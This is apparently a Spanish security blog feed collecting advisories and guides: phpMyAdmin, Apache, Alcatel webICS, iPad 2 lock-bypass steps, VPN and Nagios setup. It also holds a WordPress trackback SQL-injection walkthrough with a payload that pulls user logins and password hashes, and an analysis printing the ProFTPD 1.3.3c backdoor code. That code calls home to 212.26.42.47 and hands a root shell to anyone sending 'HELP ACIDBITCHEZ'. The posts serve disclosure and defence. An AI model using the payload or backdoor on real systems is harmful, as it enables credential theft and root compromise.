El fallo se localizaría en la función ‘simplexml_load_string’ del fichero ‘libraries/import/xml.php’. Un atacante remoto autenticado podría obtener información sensible a través de un fichero XML especialmente manipulado.

Esta vulnerabilidad ha sido descubierta por 80sec y publicada a través de la web china de recopilación de exploits, wooyun.org

Junto con el advisory se ha hecho pública una prueba de concepto que demuestra la vulnerabilidad. Se trata de un fichero XML para poder aprovechar el fallo, en el que en la etiqueta “ENTITY” se especifica la ruta al fichero al que se desea tener acceso.

Para conseguirlo, el atacante debería importar el archivo XML proporcionado por la prueba de concepto y esto mostraría el contenido del fichero del servidor elegido dentro del mensaje de error que devuelve.

Es importante destacar que el atacante debe estar autenticado en PhpMyAdmin para poder realizar importación de ficheros y por tanto aprovechar el fallo. También necesitaría permisos para la creación de bases de datos. Este escenario es especialmente crítico en sistemas de hosting compartido.

El problema está confirmado en la versión 3.4.7, aunque posiblemente afecte a otras. No se ha publicado solución oficial aún.

Más información:

Fuente original
80sec.com

Google translate
Google translation

La vulnerabilidad se encontraría en la función ‘ap_pregsub’ del fichero ‘server/util.c’ al ser llamada por el módulo ‘mod-setenvif’. Causaría un desbordamiento de enteros por el que un atacante local podría ejecutar código empleando para ello un fichero .htaccess especialmente manipulado. Los privilegios bajo los que se ejecutaría el código serían los mismos que el servidor Apache (habitualmente “nobody”, “www”, etc.). En entornos de hosting compartido, esto podría ocasionar numerosos problemas.

Con el ataque se podrían conseguir diferentes impactos: desde ralentizar el servidor y provocar una denegación de servicio, hasta la ejecución de código con los privilegios del servidor.

El atacante debe tener disponer de los permisos necesarios para crear un fichero .htaccess especialmente manipulado y el módulo mod_setenvif debe estar siendo usado por Apache.

No existe una solución oficial todavía. Sí se podrían aplicar dos soluciones temporales que de alguna forma mitigarían el impacto: La primera de ellas sería deshabilitar el módulo implicado. La segunda pasaría por imposibilitar el uso de ficheros .htaccess en aquellos directorios en los que los usuarios tuviesen permisos de escritura empleando para ello la secuencia “AllowOverride None”.

Más información:

Integer Overflow in Apache ap_pregsub via mod-setenvif
halfdog.net

El sistema ICS de Alcatel ofrece servicios de comunicación unificados a través de diferentes medios de acceso tales como dispositivos móviles y clientes web. Destacar las características del cliente web webICS que permitiría servicios finales al usuario tales como acceso a directorios personales y globales, redirección de llamadas…

Es precisamente en este cliente web donde se encontrarían las vulnerabilidades descubiertas que permitirían, entre otros, ataques de cross site scripting (XSS), tanto persistentes como no, así como cross site request forgery (CSRF).

Uno de los posibles ataques que se podrían realizar sería el cambio de la configuración del teléfono del usuario final causando una redirección de llamada a través de un XSS almacenado en la libreta de direcciones.

Las vulnerabilidades tienen asignados los siguientes CVE: CVE-2011-4058 y CVE-2011-4059. Los scripts vulnerables a CSRF se encontrarían en la ruta “/websoftphone/servlet/DispPhonSet” y “/websoftphone/servlet/DispRTC”. El ataque de XSS almacenado sería posible a través de todos los campos en los que se puedan insertar datos de la libreta de direcciones y el ataque XSS reflejado sería posible realizarlo a través de diferentes parámetros localizados principalmente en ficheros de la ruta “websoftphone/jsp/*”.

Alcatel-Lucent ha publicado un hotfix que corregiría estas vulnerabilidades.

Más información:

TC-SA-2011-01: Multiple vulnerabilities in OmniTouch Instant
Communication Suite
TC-SA2011-01

Diagrama de red:

Fortigate (H.Q.)— INTERNET — Linksys (Client)

Configuración en el linksys:
Name tunnel: linksysVpn
Interface: wan1
enable: active
Local ip: Ip pública del linksys
Subnet: red del linksys (192.168.0.0/24)
Remote ip: ip publica del fortigate
Subnet: red fortigate (192.168.1.0/24)
Ipsec Phase1: IKE with Preshared key
Phase1 DH Group: Group2
Phase1 Encryption: 3DES-SHA1
Life time: 3600
Phase2 Encryption: 3DES-SHA1
Life time: 3600
Presharekey: ***********
Aggressive Mode: Activate

Configuración en el Fortigate:
En la Phase1:
Name:linksysVpn (El mismo que el linksys)
Remote GAteway: Dial user
Interface: WAN1
Aggressive mode enable
Presharekey: *******
Encryption: 3DES-SHA1
Phase1 DH Group: Group2
Life time: 3600

En la Phase2:
Encryption: 3DES-SHA1
Life time: 3600

Estas son las reglas a aplicar en el Firewall del Fortigate:

Source Interface: internal
Source addres: red lan
Destination Interface: WAN1
Destination address: La red del linksys ( creamos una address)
Service: ANY
Action: IPSEC
VPN Tunnel: linksysVpn
Allow inbonund: enable
Allow outbound:enable

Smart Cover es un accesorio exclusivo de Ipad2 entre cuyas particularidades se encuentran la posibilidad de activar el dispositivo estando en standby sin necesidad de apretar el botón de encendido.

El fallo encontrado, permitiría a un atacante con acceso físico al aparato, acceder sin necesidad de teclear la contraseña. Parece que el atacante no tendría acceso completo, sino que solamente podría acceder a aquello que se encontraba en ejecución antes de pasar al estado de standby.

Este fallo se ha corroborado en la versión IOS 5, y quizás funcione en la rama anterior. Por ahora, la forma de corregir temporalmente este fallo pasaría por la desactivación del encendido automático por parte del dispositivo Smart Cover.

Los pasos para probar el error son sencillos:

* Bloquear el dispositivo.
* Mantener presionado el botón de apagado hasta que muestre el deslizador de apagado.
* Cerrar el Smart Cover.
* Abrir el Smart Cover.
* Presionar el botón de cancelar

Se ha publicado un vídeo demostrando la prueba de concepto. Se encuentra en el apartado de más información.

Más Información:

Anyone with a Smart Cover can break into your iPad 2
9to5mac.com

Nagios es un sistema de monitorización de redes de código abierto ampliamente utilizado, que vigila los equipos (hardware) y servicios (software) que se especifiquen, alertando cuando el comportamiento de los mismos no sea el deseado. Entre sus características principales figuran la monitorización de servicios de red (SMTP, POP3, HTTP, SNMP…), la monitorización de los recursos de sistemas hardware (carga del procesador, uso de los discos, memoria, estado de los puertos…), independencia de sistemas operativos, posibilidad de monitorización remota mediante túneles SSL cifrados o SSH, y la posibilidad de programar plugins específicos para nuevos sistemas.

Se trata de un software que proporciona una gran versatilidad para consultar prácticamente cualquier parámetro de interés de un sistema, y genera alertas, que pueden ser recibidas por los responsables correspondientes mediante (entre otros medios) correo electrónico y mensajes SMS, cuando estos parámetros exceden de los márgenes definidos por el administrador de red.

Requisitos:

Vamos a partir de una instalación limpia de Debian Linux 6.0 realizada a través de internet con la siguiente iso Debian netinstall .

Por comodidad, una vez instalado el sistema, se instalará vim:

apt-get install vim

Instalación de Nagios 3.0
En este punto nos encontramos con 2 metodos posibles de instalación, la compilación de Nagios desde las fuentes o bien utilizar la herramienta apt para instalar el correspondiente paquete .deb, en este caso, por comodidad emplearemos apt.

apt-get install nagios3

Junto Nagios se instalarán una serie de paquetes necesarios para el correcto funcionamiento de Nagios, entre ellos el servidor web apache2, php5,…

Durante el proceso de instalación, nos pedirá la contraseña que le queremos asignar al usuario nagiosadmin, usuario que se crea por defecto para el acceso a nagios a través de web.

Si todo ha ido bien, si abrimos nuestro navegador web y en la barra de direcciones ponemos http:///nagios3 nos debería pedír usuario y contraseña para el acceso a nagios, por defecto user:nagiosadmin pass:. Una vez introducidos nos mostrará la pantalla principal de nagios.

Por defecto, Nagios se monitoriza a si mismo (carga actual, espacio en disco, total de procesos y usuarios actuales).

A partir de este punto pasaremos a realizar la configuración de nagios para una red sencilla compuesta por 3 hosts (servidor nagios, maquina linux y máquina windows) así como un router sencillo.

Un poco de teoría
Para poder movernos bien por nagios, es recomendable saber la estructura de directorios creada por la instalación. Esta estructura por supuesto puede ser modificada.

/etc/nagios3 -> Contiene archivos de configuración globales.
/etc/nagios3/conf.d -> Contiene archivos de configuraciones específicas de los dispositivos y servicios monitorizados.
/usr/lib/nagios/plugins -> Contiene los archivos binarios encargados de monitorizar protocolos (FTP, HTTP, SSH, etc.)
/usr/share/doc/nagios* -> Contiene documentación y ejemplos sobre el uso de los plugins.
/usr/share/nagios/htdocs -> Contiene los archivos .php utilizados por el servidor web.
/usr/share/nagios/htdocs/images/logos -> Contiene imagenes para identificar los dispositivos en un mapa.
/var/log/nagios3 -> Contiene el registro de las alertas detectadas por Nagios.

En la siguiente parte, pasaremos a configurar los dispositivos y una monitorización sencilla de diferentes servicios.

WordPress es a día de hoy, uno de los sistemas de gestión de contenidos enfocado a la creación de blogs más extendido en el mundo, realizando una búsqueda en google por “powered by wordpress”, nos devuelve unos 108.000.000 resultados.

Si editamos el fichero /wp-includes/comment.php, encontramos el siguiente código:

function do_trackbacks($post_id) {
    global $wpdb;

    $post = $wpdb->get_row( $wpdb->prepare("SELECT * FROM $wpdb->posts WHERE ID = %d", $post_id) );
    $to_ping = get_to_ping($post_id);
    $pinged  = get_pung($post_id);
    if ( empty($to_ping) ) {
        $wpdb->update($wpdb->posts, array('to_ping' => ''), array('ID' => $post_id) );
        return;
    }

    if ( empty($post->post_excerpt) )
        $excerpt = apply_filters('the_content', $post->post_content);
    else
        $excerpt = apply_filters('the_excerpt', $post->post_excerpt);
    $excerpt = str_replace(']]>', ']]>', $excerpt);
    $excerpt = wp_html_excerpt($excerpt, 252) . '...';

    $post_title = apply_filters('the_title', $post->post_title);
    $post_title = strip_tags($post_title);

    if ( $to_ping ) {
        foreach ( (array) $to_ping as $tb_ping ) {
            $tb_ping = trim($tb_ping);
            if ( !in_array($tb_ping, $pinged) ) {
                trackback($tb_ping, $post_title, $excerpt, $post_id);
                $pinged[] = $tb_ping;
            } else {
                $wpdb->query( $wpdb->prepare("UPDATE $wpdb->posts SET to_ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID = %d", $post_id) );
            }
        }
    }
}

Si nos fijamos en la línea 29, se hace uso de la variable to_ping. Dicha variable es empleada sin pasar ningún tipo de filtrado y es la que se emplea para realizar la inyección de código SQL.

Explotación:

Para poder llevar a cabo la inserción de código, el atacante debe cumplir dos requisitos, debe tener tanto permisos publish_posts así como permisos edit_published_posts, en definitiva, permisos otorgados a usuarios del grupo autor.

El primer paso es crear un nuevo post, no importan ni el título ni el contenido del mismo, y añadiríamos en el campo “Send trackbacks to:” la sentencia SQL con la siguiente estructura:

AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’

Y la publicaríamos. Tendremos que esperar un poco a que wp_cron.php procese el trackback. La función get_to_ping informa que el siguiente trackback tiene que ser procesado.

AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’

Ahora editamos el post y duplicamos el contenido del campo “send trackbacks to:”:

AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’
AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’

Haciendo que la función get_to_ping informe que los siguientes trackbacks tienen que ser procesados:

AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’
AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,’

El registro de consultas muestra que wordpress ejecuta la sentencia SQL de la siguiente forma:

UPDATE wp_posts
SET to_ping = TRIM(REPLACE(to_ping, ‘AAA’,”)),post_title=(select/**/concat(user_login,’|',user_pass)/**/from/**/wp_users/**/where/**/id=1),post_content_filtered=TRIM(REPLACE(to_ping,”, ”))
WHERE ID = xx

Volvemos a esperar un poco para que se ejecute wp_cron.php y refrescamos la página, de esta forma veremos el resultado de nuestra consulta en el campo del título del post.

A fecha de hoy, wordpress ya ha corregido esta vulnerabilidad en su nueva versión 3.0.2 por lo que es recomendable la actualización de wordpress.

Más información:
http://blog.sjinks.pro/wordpress/858-information-disclosure-via-sql-injection-attack/

XSS:XSS

• 05/12/2010:Lectura de noticia y análisis preliminar
• 05/12/2010:Se informa a a través de correo electrónico

ProFTP es un popular servidor FTP promocionado como estable y seguro, ampliamente configurable y de diseño modular, permitiendo de esta forma escribir extensiones como cifrado SSL/TLS, RADIUS, LDAP o SQL.
Según parece, el atacante empleó para acceder al servidor una vulnerabilidad no corregida en el propio demonio FTP. De esta forma pudo reemplazar los ficheros fuente para la versión ProFTPD 1.3.3c con una versión modificada conteniendo una puerta trasera.

Todavía no está claro qué vulnerabilidad usaron los atacantes para acceder. Si fuera un fallo conocido, esto indicaría que ProFTPD no ha parcheado sus propios servidores a tiempo, dando un pésimo ejemplo. Si fuera desconocida y solo la pudiesen utilizar los atacantes, no tendrían necesidad de troyanizar la distribución central de ProFTPD, puesto que ese fallo ya les permitiría de por sí tener acceso a los servidores. Habrá que esperar aclaraciones.

La modificación no autorizada del código fuente fue advertida por Jeroen Geilman el miércoles 1 de diciembre y solucionada posteriormente.

El servidor actúa como site principal para el proyecto ProFTPD así como servidor de distribución rsync para todos los servidores espejo. Esto implica que cualquier persona que se haya descargado la versión ProFTPD 1.3.3c de uno de los espejos oficiales entre los días 28 de noviembre y 1 de diciembre están afectados por este problema.

La puerta trasera introducida por los atacantes permiten acceso remoto con permisos de root a usuarios no autenticados en los sistemas que estén ejecutando la versión modificada del demonio ProFTPD dándole al atacante control total sobre el sistema.

Tal y como podemos comprobar por los cambios introducidos por el atacante en el programa, al ejecutarse, hace una petición (Línea 14) a la dirección ip 212.26.42.47 (línea 30) al puerto 9090 (línea 12)

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>

#define DEF_PORT 9090
#define DEF_TIMEOUT 15
#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"

int sock;

void handle_timeout(int sig)
{
    close(sock);
    exit(0);
}

int main(void)
{

        struct sockaddr_in addr;
        struct hostent *he;
        u_short port;
        char ip[20]="212.26.42.47";
        port = DEF_PORT;
        signal(SIGALRM, handle_timeout);
        alarm(DEF_TIMEOUT);
        he=gethostbyname(ip);
        if(he==NULL) return(-1);
        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        memset(addr.sin_zero, 0, 8);
        sprintf(ip, inet_ntoa(addr.sin_addr));
        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
        {
                return EXIT_FAILURE;
        }
        if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
        {
            close(sock);
            return EXIT_FAILURE;
        }
        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
        {
            return EXIT_FAILURE;
        }
        close(sock);

return 0; }

Con esta petición en los logs, el atacante ya sabe qué máquina ha usado su ProFTPD troyanizado y dónde acudir. En segundo lugar, el atacante se conecta a ese servidor por FTP y escribe:

HELP ACIDBITCHEZ

Lo que le dará acceso root debido a una segunda modificación realizada en el fichero help.c

} else {
 if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
  /* List the syntax for the given target command. */
  for (i = 0; i < help_list->nelts; i++) {

La palabra ACIDBITCHEZ ha sido arbitrariamente elegida por el atacante.

Se recomienda a los usuarios que estén ejecutando dicha versión que comprueben si sus sistemas se han visto comprometidos y compilen o ejecuten una versión actualizada del código.
Para verificar la integridad de los ficheros fuente, se recomienda el uso de las firmas GPG disponibles tanto en los diferentes servidores FTP así como en la página oficial del proyecto ProFTPD:

http://www.proftpd.org/md5_pgp.html

Hash MD5:
018e0eb1757d9cea2a0e17f2c9b1ca2d proftpd-1.3.2e.tar.bz2
4ecb82cb1050c0e897d5343f6d2cc1ed proftpd-1.3.2e.tar.gz
8571bd78874b557e98480ed48e2df1d2 proftpd-1.3.3c.tar.bz2
4f2c554d6273b8145095837913ba9e5d proftpd-1.3.3c.tar.gz

Firmas PGP:

proftpd-1.3.2e.tar.bz2.asc
—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAkuFYtsACgkQt46JP6URl2rqVACgzefr58XHVoh2ARERbkW5qPzb
Qj4AoOwwH55FlS7OM8sBjELT0OhrN0jQ
=E6hR
—–END PGP SIGNATURE—–

proftpd-1.3.2e.tar.gz.asc
—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAkuFYuAACgkQt46JP6URl2pTVQCeJ7HM7ltLwJwb4TQ3AwT9j36n
/ywAn3rB6HRVDGTF2WuOJgn/dss7VWeV
=G553
—–END PGP SIGNATURE—–

proftpd-1.3.3c.tar.bz2.asc
—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAkzLAWYACgkQt46JP6URl2qu3QCcDGXD+fRPOdKMp8fHyHI5d12E
83gAoPHBrjTFCz4MKYLhH8qqxmGslR2k
=aLli
—–END PGP SIGNATURE—–

proftpd-1.3.3c.tar.gz.asc
—–BEGIN PGP SIGNATURE—–
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEABECAAYFAkzLAW0ACgkQt46JP6URl2ojfQCfXy/hWE8G5mhdhdLpaPUZsofK
pO8Anj+uP0hQcn1E/CEUddI0mezlSCmg
=e8el
—–END PGP SIGNATURE—–

Fuentes:
Sourceforge -[Proftpd-user] ProFTPD ftp.proftpd.org compromise
http://xorl.wordpress.com/
Hispasec -Una al dí

• 19/07/2010: Se descubre XSS en múltiples páginas web creadas por la empresa novalsys.
• 20/07/2010: Se informa a través de correo electrónico.
• 21/07/2010: Se confirma la recepción del correo electrónico.
• 02/08/2010: Se informa nuevamente a través de correo electrónico.
]]> http://erewhon-network.net/wordpress/?feed=rss2&p=231 0